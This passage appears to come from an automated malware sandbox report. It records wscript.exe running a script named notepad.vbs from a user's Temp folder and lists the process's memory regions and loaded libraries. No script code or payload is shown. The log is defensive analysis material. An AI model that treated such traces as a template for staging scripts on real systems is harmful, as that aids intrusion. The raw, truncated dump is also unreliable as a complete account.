lpCPInfo=0x4a034260) returned 1 [0025.748] SetThreadUILanguage (LangId=0x0) returned 0x409 [0025.748] exit (_Code=0) Thread: id = 3 os_tid = 0x984 Thread: id = 4 os_tid = 0x988 Thread: id = 5 os_tid = 0x98c Thread: id = 7 os_tid = 0x998 Process: id = "3" image_name = "wscript.exe" filename = "c:\\windows\\syswow64\\wscript.exe" page_root = "0x4ecdc000" os_pid = "0x990" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x96c" cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 279 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 280 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 281 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 282 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 283 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 284 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 285 start_va = 0xa10000 end_va = 0xa35fff entry_point = 0xa10000 region_type = mapped_file name = "wscript.exe" filename = "\\Windows\\SysWOW64\\wscript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe") Region: id = 286 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 287 start_va = 0x77850000 end_va = 0x779cffff entry_point = 0x77850000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 288 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 289 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 290 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 291 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 292 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 293 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 294 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 295 start_va = 0x2f0000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 296 start_va = 0x74d90000 end_va = 0x74d97fff entry_point = 0x74d90000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 297 start_va = 0x74da0000 end_va = 0x74dfbfff entry_point = 0x74da0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 298 start_va = 0x74e00000 end_va = 0x74e3efff entry_point = 0x74e00000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 299 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 300 start_va = 0x75a20000 end_va = 0x75b2ffff entry_point = 0x75a20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 301 start_va = 0x765f0000 end_va = 0x76635fff entry_point = 0x765f0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 302 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x0 region_type = private name = "private_0x0000000077450000" filename = "" Region: id = 303 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x0 region_type = private name = "private_0x0000000077550000" filename = "" Region: id = 304 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 305 start_va = 0x60000 end_va = 0xc6fff entry_point = 0x60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 306 start_va = 0x74e60000 end_va = 0x74e68fff entry_point = 0x74e60000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 307 start_va = 0x753a0000 end_va = 0x753abfff entry_point = 0x753a0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 308 start_va = 0x753b0000 end_va = 0x7540ffff entry_point = 0x753b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 309 start_va = 0x75410000 end_va = 0x754acfff entry_point = 0x75410000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 310 start_va = 0x75540000 end_va = 0x7569bfff entry_point = 0x75540000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 311 start_va = 0x756f0000 end_va = 0x757effff entry_point = 0x756f0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 312 start_va = 0x75b30000 end_va = 0x75bcffff entry_point = 0x75b30000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 313 start_va = 0x75e30000 end_va = 0x75edbfff entry_point = 0x75e30000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 314 start_va = 0x75f60000 end_va = 0x75feefff entry_point = 0x75f60000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 315 start_va = 0x762b0000 end_va = 0x762c8fff entry_point = 0x762b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 316 start_va = 0x762d0000 end_va = 0x762d9fff entry_point = 0x762d0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 317 start_va = 0x772d0000 end_va = 0x773bffff entry_point = 0x772d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 318 start_va = 0x773c0000 end_va = 0x7744ffff entry_point = 0x773c0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 319 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 320 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 321 start_va = 0x4f0000 end_va = 0x677fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 322 start_va = 0x6d0000 end_va = 0x6dffff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 323 start_va = 0x75d40000 end_va = 0x75e0bfff entry_point = 0x75d40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 324 start_va = 0x76500000 end_va = 0x7655ffff entry_point = 0x76500000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 325 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 326 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 327 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 328 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 329 start_va = 0x6e0000 end_va = 0x860fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 330 start_va = 0xa40000 end_va = 0x1e3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 331 start_va = 0x1e40000 end_va = 0x2182fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e40000" filename = "" Region: id = 332 start_va = 0x74d00000 end_va = 0x74d7ffff entry_point = 0x74d00000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 333 start_va = 0x270000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 334 start_va = 0x870000 end_va = 0x94efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 335 start_va = 0x9b0000 end_va = 0x9effff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 336 start_va = 0x2350000 end_va = 0x244ffff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 337 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 338 start_va = 0x2450000 end_va = 0x271efff entry_point = 0x2450000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 339 start_va = 0xf0000 end_va = 0xfefff entry_point = 0xf0000 region_type = mapped_file name = "wscript.exe" filename = "\\Windows\\SysWOW64\\wscript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe") Region: id = 340 start_va = 0x74c80000 end_va = 0x74cdefff entry_point = 0x74c80000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 341 start_va = 0x2240000 end_va = 0x227ffff entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 342 start_va = 0x2780000 end_va = 0x287ffff entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 343 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 344 start_va = 0x74ce0000 end_va = 0x74cf2fff entry_point = 0x74ce0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 345 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 346 start_va = 0x754b0000 end_va = 0x75532fff entry_point = 0x754b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 347 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 348 start_va = 0x74c10000 end_va = 0x74c7afff entry_point = 0x74c10000 region_type = mapped_file name = "vbscript.dll" filename = "\\Windows\\SysWOW64\\vbscript.dll" (normalized: "c:\\windows\\syswow64\\vbscript.dll") Region: id = 349 start_va = 0x160000 end_va = 0x160fff entry_point = 0x160000 region_type = mapped_file name = "notepad.vbs" filename = "\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\notepad.vbs") Region: id = 350 start_va = 0x759f0000 end_va = 0x75a1cfff entry_point = 0x759f0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 351 start_va = 0x76190000 end_va = 0x762acfff entry_point = 0x76190000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 352 start_va = 0x772c0000 end_va = 0x772cbfff entry_point = 0x772c0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 353 start_va = 0x74e40000 end_va = 0x74e55fff entry_point = 0x74e40000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 354 start_va = 0x270000 end_va = 0x2abfff entry_point = 0x270000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 355 start_va = 0x2b0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 356 start_va = 0x270000 end_va = 0x2abfff entry_point = 0x270000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 357 start_va = 0x270000 end_va = 0x2abfff entry_point = 0x270000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 358 start_va = 0x270000 end_va = 0x2abfff entry_point = 0x270000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 359 start_va = 0x270000 end_va = 0x2abfff entry_point = 0x270000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 360 start_va = 0x74bd0000 end_va = 0x74c0afff entry_point = 0x74bd0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 361 start_va = 0x160000 end_va = 0x160fff entry_point = 0x160000 region_type = mapped_file name = "notepad.vbs" filename = "\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\notepad.vbs") Region: id = 362 start_va = 0x3a0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 363 start_va = 0x2a40000 end_va = 0x2b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 364 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 365 start_va = 0x74bc0000 end_va = 0x74bc7fff entry_point = 0x74bc0000 region_type = mapped_file name = "msisip.dll" filename = "\\Windows\\SysWOW64\\msisip.dll" (normalized: "c:\\windows\\syswow64\\msisip.dll") Region: id = 366 start_va = 0x2b40000 end_va = 0x2f3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b40000" filename = "" Region: id = 367 start_va = 0x270000 end_va = 0x270fff entry_point = 0x270000 region_type = mapped_file name = "notepad.vbs" filename = "\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\notepad.vbs") Region: id = 368 start_va = 0x2720000 end_va = 0x275ffff entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 369 start_va = 0x3030000 end_va = 0x312ffff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 370 start_va = 0x74ba0000 end_va = 0x74bb5fff entry_point = 0x74ba0000 region_type = mapped_file name = "wshext.dll" filename = "\\Windows\\SysWOW64\\wshext.dll" (normalized: "c:\\windows\\syswow64\\wshext.dll") Region: id = 371 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 372 start_va = 0x74b10000 end_va = 0x74b93fff entry_point = 0x74b10000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 373 start_va = 0x76670000 end_va = 0x772b9fff entry_point = 0x76670000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 374 start_va = 0x75ce0000 end_va = 0x75d36fff entry_point = 0x75ce0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 375 start_va = 0x950000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 376 start_va = 0x74ae0000 end_va = 0x74b0cfff entry_point = 0x74ae0000 region_type = mapped_file name = "scrobj.dll" filename = "\\Windows\\SysWOW64\\scrobj.dll" (normalized: "c:\\windows\\syswow64\\scrobj.dll") Region: id = 377 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 378 start_va = 0x2880000 end_va = 0x297ffff entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 379 start_va = 0x74ab0000 end_va = 0x74ad0fff entry_point = 0x74ab0000 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 380 start_va = 0x74a90000 end_va = 0x74aa1fff entry_point = 0x74a90000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 381 start_va = 0x74a60000 end_va = 0x74a89fff entry_point = 0x74a60000 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 382 start_va = 0x270000 end_va = 0x27bfff entry_point = 0x270000 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 383 start_va = 0x280000 end_va = 0x292fff entry_point = 0x280000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 384 start_va = 0x74eb0000 end_va = 0x74fa4fff entry_point = 0x74eb0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 385 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 386 start_va = 0x370000 end_va = 0x371fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 387 start_va = 0x2190000 end_va = 0x21cffff entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 388 start_va = 0x3130000 end_va = 0x322ffff entry_point = 0x0 region_type = private name = "private_0x0000000003130000" filename = "" Region: id = 389 start_va = 0x74fb0000 end_va = 0x7514dfff entry_point = 0x74fb0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 390 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 391 start_va = 0x390000 end_va = 0x391fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 392 start_va = 0x74a10000 end_va = 0x74a5bfff entry_point = 0x74a10000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 393 start_va = 0x72cb0000 end_va = 0x7372ffff entry_point = 0x72cb0000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 394 start_va = 0x749d0000 end_va = 0x74a0bfff entry_point = 0x749d0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 395 start_va = 0x757f0000 end_va = 0x759eafff entry_point = 0x757f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 396 start_va = 0x76420000 end_va = 0x76424fff entry_point = 0x76420000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 397 start_va = 0x380000 end_va = 0x380fff entry_point = 0x380000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 398 start_va = 0x3e0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 399 start_va = 0x75be0000 end_va = 0x75cd4fff entry_point = 0x75be0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 400 start_va = 0x762e0000 end_va = 0x76415fff entry_point = 0x762e0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 401 start_va = 0x2a00000 end_va = 0x2a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 402 start_va = 0x3410000 end_va = 0x350ffff entry_point = 0x0 region_type = private name = "private_0x0000000003410000" filename = "" Region: id = 403 start_va = 0x74e80000 end_va = 0x74ea0fff entry_point = 0x74e80000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 404 start_va = 0x756a0000 end_va = 0x756e4fff entry_point = 0x756a0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 405 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 406 start_va = 0x680000 end_va = 0x683fff entry_point = 0x680000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 407 start_va = 0x690000 end_va = 0x6aefff entry_point = 0x690000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 408 start_va = 0x6b0000 end_va = 0x6b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 409 start_va = 0x75e10000 end_va = 0x75e21fff entry_point = 0x75e10000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 410 start_va = 0x75ff0000 end_va = 0x7618cfff entry_point = 0x75ff0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 411 start_va = 0x76640000 end_va = 0x76666fff entry_point = 0x76640000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 412 start_va = 0x3510000 end_va = 0x3902fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003510000" filename = "" Region: id = 413 start_va = 0x74e70000 end_va = 0x74e7afff entry_point = 0x74e70000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 414 start_va = 0x680000 end_va = 0x683fff entry_point = 0x680000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 415 start_va = 0x6c0000 end_va = 0x6c3fff entry_point = 0x6c0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 416 start_va = 0x950000 end_va = 0x97ffff entry_point = 0x950000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db") Region: id = 417 start_va = 0x980000 end_va = 0x980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 418 start_va = 0x9a0000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 419 start_va = 0x21d0000 end_va = 0x2235fff entry_point = 0x21d0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: 